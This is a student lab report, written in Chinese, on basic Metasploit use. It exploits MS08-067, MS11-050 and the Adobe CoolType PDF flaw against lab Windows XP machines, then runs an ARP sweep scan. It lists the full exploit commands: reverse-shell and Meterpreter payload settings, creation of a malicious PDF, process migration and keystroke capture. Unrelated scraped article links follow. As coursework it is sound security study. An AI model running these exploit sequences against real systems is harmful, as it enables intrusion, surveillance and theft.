实践目标

· 掌握metasploit的基本应用方式。

· 具体需要完成

(1)ms08_067;

(2)ms11_050;

(3)Adobe

(4)成功应用任何一个辅助模块。

报告

本次实验一共用到了三个虚拟机。一定要用课题负责人拷贝的虚拟机 啊啊 啊啊啊啊 !!!用自己原来的版本真的做不出来。。。虽然都是Windows XP SP3加上IE7。。。

任务一:MS08_067漏洞渗透攻击实践

实验所需

· 两台虚拟机,其中一台为kali,一台为Windows XP SP3(英文版)。

· 在VMware中设置两台虚拟机为NAT模式





由于两台虚拟机IP地址不在同一个网段上,需要重新设置XP的IP地址。kali IP是192.168.88.132,所以把XP的IP地址设置为:192.168.88.133。



然后就可以ping通啦!

MS08_067远程漏洞攻击实践:Shell

· 在kali终端中开启msfconsole。

· 输入命令search ms08_067,会显示出找到的渗透模块,如下图所示:

· 输入命令use exploit/windows/smb/ms08_067_netapi,进入该漏洞模块的使用。然后输入命令show payloads会显示出有效的攻击载荷,如下图所示。

· 命令show targets会显示出可以被攻击的靶机的操作系统型号,如下图所示:

然后set target 0,自动匹配。

· 使用命令set payload generic/shell_reverse_tcp设置攻击有效载荷。

· 使用show options显示需要设置的数据。

设置数据:

set LHOST 192.168.88.132

set RHOST 192.168.88.133

· 使用命令show options再次查看payload状态。

· 输入命令exploit开始攻击,如下图:



耶!!成功啦!

· 在kali上输入ipconfig/all,如下图所示:

· 再dir一下下看看:

· 在Windows XP上使用ipconfig/all结果是什么呢~当然是一样的:



OK啦!

任务二: IE浏览器渗透攻击——MS11050安全漏洞

实验准备

· 两台虚拟机,其中一台为kali,一台为Windows XP SP3(包含IE7)。

· 设置虚拟机网络为NAT模式,保证两台虚拟机可以相互间ping通,关闭靶机防火墙。

实验步骤:

· 在kali终端中开启msfconsole。

· 输入命令use windows/browser/ms11_050_mshtml_cobjectelement,进入该漏洞模块。

· 输入info查看信息:

· 对应的targets:

· 设置对应的载荷set payload windows/meterpreter/reverse_tcp;

· show options查看需要设置的相关信息:

· 设置相关信息

set LHOST 192.168.88.132

set LPORT  226

set URIPATH xyh

· 在靶机IE上输入网址,此时kali中显示一个session 1已经创建:

· 输入命令sessions -i 1,开始连接。攻击成功,开始截图、按键抓取然后获取shell:

任务三:Adobe阅读器渗透攻击

实验准备

· 两台虚拟机,其中一台为kali,一台为Windows XP SP3(winxpAttaker,密码:mima1234)。

· 设置虚拟机网络为NAT模式,保证两台虚拟机可以ping通。

· kali下打开显示隐藏文件,如下图所示:

实验步骤:

· kali终端中启动msfconsole。

· 输入命令use exploit/windows/fileformat/adobe_cooltype_sing,进入该漏洞模块的使用。

· 使用命令set payload windows/meterpreter/reverse_tcp设置攻击有效载荷。show options显示我们需要在攻击前需要设置的数据。

· 输入命令

set FILENAME 5226adobe.pdf 

set LHOST 192.168.88.132

set LPORT 226

如图所示:

并使用命令show options,看是否设置成功。

· 输入exploit,生成pdf文件,并将pdf复制到靶机。



· 使用命令back退出当前模块,并使用use exploit/multi/handler新建一个监听模块。

使用set payload windows/meterpreter/reverse_tcp建立一个反向连接,使用命令exploit开始攻击,在XP中打开5226adobe.pdf。



· wow,然后就可以sysinfo一波了:

· 使用ps查看当前的进程,找到explorer.exe的进程号

· 使用命令migrate 1648,将进程迁移到explorer.exe



· 输入shell,查看xp靶机信息。

· 在靶机xp中使用命令netstat -an,查看本地tcp连接。



看,是他就是他!

任务四:应用一个辅助模块

实验准备

两台虚拟机,其中一台为kali,一台为Windows 7 x64 Professional

实验概述:

使用了msf的两个辅助模块:发现局域网中的主机和用nmap进行扫描。

实验步骤

· 先手动创建一个msf所需的数据库,开启msf

service postgresql start
msfdb start

· 输入命令 use auxiliary/scanner/discovery/arp_sweep进入模块,然后show options查看需要设置的消息,其中RHOST填写自己电脑所在网段

· 使用命令

set interface eth0

set RHOSTS 192.168.88.0/24

set threads 2

设置一下

· 使用命令run开启扫描,结果可以看到除了win 7虚拟机的IP地址外,还有其他的IP地址

· 可以ping通,开启nmap扫描,可以看到报告~MAC地址如图中圈出来的部分

over!

AFTER

实验后回答问题

exploit:

漏洞利用测试程序,属于恶意软件的一种,注意,有漏洞不一定就有 Exploit (利用)。有 Exploit 就肯定有漏洞。

payload:

有效载荷,则是基于exp的一些特定的利用方式,通常是对漏洞测试平台而言的。

网上看到的一段有意思的解释

Exploit是用来传送Payload的。Exploit相当于运载火箭,Payload相当于弹头。

The exploit is what delivers the payload. Take a missile as an analogy. You have the rocket and fuel and everything else in the rocket, and then you have the warhead that does the actual damage. Without the warhead, the missile doesn't do very much when it hits. Additionally, a warhead isn't much use if it goes off in your bunker without a rocket delivering it.

The delivery system(missile) is the exploit and the payload (warhead) is the code that actually does something.

Exploits give you the ability to 'pop a shell/run your payload code'.

Example payloads are things like Trojans/RATs, keyloggers, reverse shells etc.

Payloads are only referred to when code execution is possible and not when using things like denial of service exploits.

encode:对需要传输的文件进行编码,使其特征码改变,起到免杀的作用。

实验总结与体会

对于msf的命令和用法进行一下汇总~~

msf> show exploits与msf> show payloads:这两条命令用于展示Metaploit目录中所有可用的漏洞利用代码和攻击载荷。
msf> search ms03_026_dcom:用于搜索某个特定的漏洞利用代码,也可以使用该命令搜索任意特定的搜索项。
msf> use exploit/windows/smb/ms08_067_netapi,进入该漏洞模块的使用。
show options:用于查看当前使用的exploit的可用选项或参数,各种参数包括主机IP地址、线程等,其中标记为yes的参数必须设置相应值以便有效执行该漏洞利用代码。
set:该命令用于为当前使用的exploit中的某个参数设置具体值,例如为某个特定漏洞利用代码设置具体的攻击载荷。
unset:可以使用unset命令取消对某个参数值的设置。
show targets:每个exploit都设计用于攻击某种目标服务,此命令用于展示该exploit有哪些可用的攻击目标。

之前用的我的原来的XP SP3的虚拟机,但是无论如何都不能成功,后来发现中文版的那个漏洞已经有相应的补丁了。。。我以后一定时时刻刻都及时安装更新!!!虽然并没有什么卵用。。。但是能补一点是一点吧。。。

20145226夏艺华 EXP5 MSF基础应用的更多相关文章

  1. 20145226夏艺华 网络对抗技术 EXP9 web安全基础实践

    20145226夏艺华 网络对抗技术 EXP9 web安全基础实践 !!!免考项目:wannacry病毒分析+防护 一.实验后回答问题 SQL注入攻击原理,如何防御 攻击原理 "SQL注入& ...

  2. 20145226夏艺华 网络对抗技术EXP8 WEB基础实践

    20145226夏艺华 网络对抗技术EXP8 WEB基础实践 实验问题回答 1.什么是表单? 表单在网页中主要负责数据采集功能.一个表单有三个基本组成部分: 表单标签:这里面包含了处理表单数据所用CG ...

  3. 20145226夏艺华 Exp6 信息搜集与漏洞扫描

    20145226夏艺华 Exp6 信息搜集与漏洞扫描 基础问题回答 哪些组织负责DNS,IP的管理? · 全球根服务器均由美国政府授权的ICANN统一管理,负责全球的域名根服务器.DNS和IP地址管理 ...

  4. 20145226夏艺华 《Java程序设计》实验报告四

    实验四 Android开发基础 实验内容 基于Android Studio开发简单的Android应用并部署测试 了解Android组件.布局管理器的使用 掌握Android中事件处理机制 Andro ...

  5. 20145226夏艺华《网络对抗》第一次实验拓展:shellcode注入+return-to-libc

    20145226夏艺华<网络对抗>第一次实验拓展:shellcode注入+return-to-libc shellcode注入实践 编写shellcode 编写shellcode已经在之前 ...

  6. 20145226夏艺华 网络对抗技术 EXP7 网络欺诈技术防范

    20145226夏艺华 网络对抗技术 EXP7 网络欺诈技术防范 实践内容 本实践的目标理解常用网络欺诈背后的原理,以提高防范意识,并提出具体防范方法. · 简单应用SET工具建立冒名网站 · ett ...

  7. 20145226夏艺华 网络对抗技术EXP4 恶意代码分析

    20145226夏艺华 网络对抗技术EXP4 恶意代码分析(未完成版) 回答问题 (1)如果在工作中怀疑一台主机上有恶意代码,但只是猜想,所有想监控下系统一天天的到底在干些什么.请设计下你想监控的操作 ...

  8. 20145226夏艺华 逆向及Bof基础实践

    逆向及Bof基础实践 实践目标 本次实践的对象是一个名为pwn1的linux可执行文件. 该程序正常执行流程是:main调用foo函数,foo函数会简单回显任何用户输入的字符串,如图所示: 该程序同时 ...

  9. 20145226夏艺华 《Java程序设计》第0周学习总结

    关于师生关系: 学生和老师之间我觉得关系时多元化的,不能拘泥于单独的一种关系:灌输与被灌输,教授与被教授--我认为,在不同的课程阶段,师生之间的关系都可以发生变化.前期的老师更像是一个指路的人,而在入 ...

随机推荐

  1. Linux的CPU相关知识

    超线程和多线程的区别? 超线程从硬件层面理解,即一个CPU的部件(可以理解为核)同时执行多条指令,表现就是同时执行多个线程.多线程是软件层面的概念,比如CPU只有一个核,通过线程调度可以在一个时间段内 ...

  2. Mac原生Terminal快速登录ssh

    1. 创建rsa key 在终端中输入以下命令: ssh-keygen -t rsa 完成之后可以在~/.ssh目录下找到公钥和私钥     如果你与我一样有使用gitlab,那么这个秘钥应该已经存在 ...

  3. jq局部打印插件jQuery.print.js(兼容IE8)

    /* @license * jQuery.print, version 1.5.1 * (c) Sathvik Ponangi, Doers' Guild * Licence: CC-By (http ...

  4. 【[SDOI2008]Sandy的卡片】

    被\(mhr\)的暴力干翻了 这道题做法还是非常好想的 先做一遍差分,在每个串的某尾插入一个特殊字符,再将所有的串拼接在一起 现在的问题就转化为找到一个最长的公共子串使得其出现了\(n\)次,但是在一 ...

  5. Python 多线程 start()和run()方法的区别(三)

    上一篇文章最后只是简单介绍了start()方法和run()方法,这篇文章再详细地看下start()和run()的区别. 在实例调用的函数中加入打印当前线程的名字,分别用start()方法和run()方 ...

  6. No.4 - 3D 空间的卡片翻转动效

    参考 ①张鑫旭http://www.zhangxinxu.com/wordpress/2012/09/css3-3d-transform-perspective-animate-transition/ ...

  7. [转]墨卡托投影坐标系(Mercator Projection)原理及实现C代码

    墨卡托投影是一种“等角正切圆柱投影”,荷兰地图学家墨卡托(Mercator)在1569年拟定:假设地球被围在一个中空的圆柱里,其赤道与圆柱相接触,然后再假想地球中心有一盏灯,把球面上的图形投影到圆柱体 ...

  8. PDF压缩,在线压缩免费

    https://smallpdf.com/ 一个很牛逼的网站 https://zh.wikihow.com/ https://zh.wikihow.com/%E9%A6%96%E9%A1%B5

  9. centos 清除yum缓存

    No package nginx available. yum makecache yum install epel-release yum install nginx

  10. Beta Distribution

    首先思考一个问题: 熟悉棒球运动的都知道有一个指标就是棒球击球率(batting average),就是用一个运动员击中的球数除以击球的总数,我们一般认为0.266是正常水平的击球率,正常范围在0.2 ...